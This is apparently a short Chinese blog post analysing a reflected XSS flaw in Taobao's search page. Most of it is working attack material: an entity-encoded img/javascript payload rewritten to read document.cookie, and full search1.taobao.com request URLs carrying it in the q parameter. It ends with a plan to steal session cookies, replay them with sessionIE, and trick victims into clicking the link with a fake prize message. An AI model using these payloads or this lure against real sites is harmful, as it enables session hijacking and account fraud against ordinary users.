淘宝xss的简单分析

bzcyer提到了一个淘宝的xss问题。
帖子的地址
http://bbs.51testing.com/thread-123477-1-1.html

感觉很有意思，淘宝竟然连基本的xss符号都没有过滤。

这是作者的原来的xss测试语句。
>"'><img src=&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;alert(21879)>

简单修改一下
>"'><img src=&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;alert(document.cookie)>

监听http发送请求的过程。
原始的正常请求
http://search1.taobao.com/browse/search_auction.htm?f=D9_5_1&commend=all&prop=&ppath=&promote=&_promote=&isnew=&user_action=initiative&at_topsearch=1&search_type=auction&q=xxxxxxxxxx&cat=&productCat=1&book_search=fuzzy_sr_all_text

修改请求为xss攻击语句。
http://search1.taobao.com/browse/search_auction.htm?f=D9_5_1&commend=all&prop=&ppath=&promote=&_promote=&isnew=&user_action=initiative&at_topsearch=1&search_type=auction&q=>"'><img src=&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;alert(document.cookie)>&cat=&productCat=1&book_search=fuzzy_sr_all_text

没有成功，呵呵。
忘记http请求会修改编码的，修正一下
http://search1.taobao.com/browse/search_auction.htm?f=D9_5_1&commend=all&prop=&ppath=&promote=&_promote=&isnew=&user_action=initiative&at_topsearch=1&search_type=auction&q=>"'><img src=javascrīpt:alert(document.cookie)>&cat=&productCat=1&book_search=fuzzy_sr_all_text

这样就已经可以达到xss了。


下一步就是黑客的做法了。

修改xss语句为获取cookie，然后使用sessionIE，就可以操纵他的cookie了。因为快下班了。所以，没有时间继续研究了。如果深挖，可能会有更多的应用。

以后再研究，给一个完整利用的方法。我不知道淘宝会不会有什么限制，比如即使获得session，仍然无法登陆对方的帐户。这就不得而知了。试验一下才知道。

如果可以的话，利用起来就是欺骗了。

将以上的xss连接发送给别人，说是中将之类的，别人点击之后，就会截获他的session，进行一些操作了。
除非，淘宝做了闲置，否则，这是一个明显的漏洞和bug。